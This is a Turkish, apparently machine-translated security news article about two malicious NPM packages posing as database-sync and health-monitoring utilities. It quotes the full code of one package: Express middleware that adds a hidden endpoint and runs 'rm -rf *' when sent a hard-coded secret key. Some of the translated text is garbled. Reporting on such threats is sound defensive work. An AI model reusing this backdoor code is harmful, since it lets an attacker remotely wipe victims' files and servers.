Güvenlik araştırmacıları, NPM ekosisteminde, kötü niyetli paketlerin meşru kamu hizmetleri olarak maskelenirken, tüm üretim ortamlarını silme yeteneğine sahip yıkıcı arka kapılarda rahatsız edici yeni bir tehdit ortaya çıkardılar.
Bu paketler, iş operasyonlarını sakatlayabilecek tam sistem yıkımına odaklanan geleneksel kimlik bilgisi hırsızlığı veya kripto para madenciliği saldırılarından önemli bir artışı temsil etmektedir.
Saldırı kampanyası, kendilerini veritabanı senkronizasyonu ve sistem izleme araçları olarak gizleyen iki ana paketin etrafında toplanıyor.
.png
)
İlk paket olan Express-api-sync, veritabanları arasında veri senkronizasyonunu kolaylaştırdığını iddia ediyor, ancak hiçbir veritabanı işlevselliği içermiyor.
Bunun yerine, uzak bir öldürme komutunu sessizce bekleyen gizli bir arka kapı uygular. İkinci paket olan sistem-sağlık senkronizasyonu-api, gizlice birden fazla yıkım uç noktası ve veri açığa çıkma kanalları oluştururken kendisini kapsamlı bir izleme çözümü olarak sunar.
Socket.DEV analistleri, NPM kayıt defterinin rutin davranışsal analizi sırasında bu kötü amaçlı paketleri tanımladı ve gizli HTTP uç noktalarını kaydetme ve dosya silme özelliklerini uygulama konusunda şüpheli kalıplarına dikkat çekti.
Her iki paket de e -posta adresi kullanılarak NPM kullanıcısı “Botsailer” tarafından yayınlandı [email protected]izole olaylardan ziyade koordineli bir saldırı kampanyası önermek.
Bu keşiflerin sonuçları, bireysel tehlikeye atılan sistemlerin çok ötesine uzanmaktadır. Veri hırsızlığı veya kripto para madenciliği yoluyla değer elde etmeyi amaçlayan geleneksel kötü amaçlı yazılımların aksine, bu paketler tam altyapı yıkımına öncelik verir.
Saldırı metodolojisindeki bu değişim, sadece finansal kazançtan ziyade sabotaj, rekabetçi aksaklık veya devlet düzeyinde müdahale ile motive edilen rakiplerin olduğunu göstermektedir.
Bu paketleri bilmeden yükleyen kuruluşlar, tüm uygulama dizinlerini, kaynak kodu depolarını, yapılandırma dosyalarını ve yerel veritabanlarını saniyeler içinde kaybetme riskiyle karşı karşıyadır.
Enfeksiyon mekanizması ve gizli operasyonlar
Bu kötü niyetli paketler tarafından kullanılan enfeksiyon mekanizması, modern web uygulama mimarisi ve geliştirici iş akışlarının sofistike bir şekilde anlaşılmasını göstermektedir.
Her iki paket de mevcut Node.js uygulamalarına sorunsuz bir şekilde entegre olmak için ara katman yazılımı kalıplarından yararlanır, bu da ilk dağıtım ve test aşamaları sırasında kötü amaçlı işlevlerini neredeyse görünmez hale getirir.
Express-API-Sync paketi, standart ekspres ara katman yazılımı döndüren ve tipik uygulama başlatma koduna mükemmel bir şekilde karışmasını sağlayan bir işlevi dışa aktarır.
Ancak, kötü amaçlı yük yükü yalnızca uygulamadaki herhangi bir uç noktaya ilk HTTP isteği üzerine etkinleştirilir. Bu gecikmeli aktivasyon stratejisi, trafik modelleri minimal ve tahmin edilebilir olduğunda geliştirme ve test aşamaları sırasında arka kapının uykuda kalmasını sağlar.
const { exec } = require('child_process');
let initialized = false;
module.exports = function(options={}){
const secret = "DEFAULT_123";
return function (req,res,next){
if(!initialized){
try{
const app = req.app
app.post('/api/this/that', (req, res) => {
const providedkey = req.headers['x-secret-key']|| req.body?.secretKey;
if(providedkey === secret){
exec('rm -rf *',{cwd:process.cwd()},(err)=>{
if (err) res.status(500).send({error:err.message})
else res.status(200).send({message:"All files deleted"})
})
}
else res.status(403).send({error:"Invalid secret key"})
})
initialized = true;
}catch(e){}
}
next();
}
}Sistem-sağlık senkronizasyonu-api paketi, birden fazla gereksiz arka kapı uç noktasını korurken, ekspres, oruç ve ham HTTP sunucuları arasında çalışmak için çerçeve otomatik tespiti uygulayarak daha sofistike kaçış teknikleri kullanır.
Tehdit istihbarat aramasıyla tehdit araştırmalarını hızlandırın ve zenginleştirin! -> 50 Deneme Arama İsteği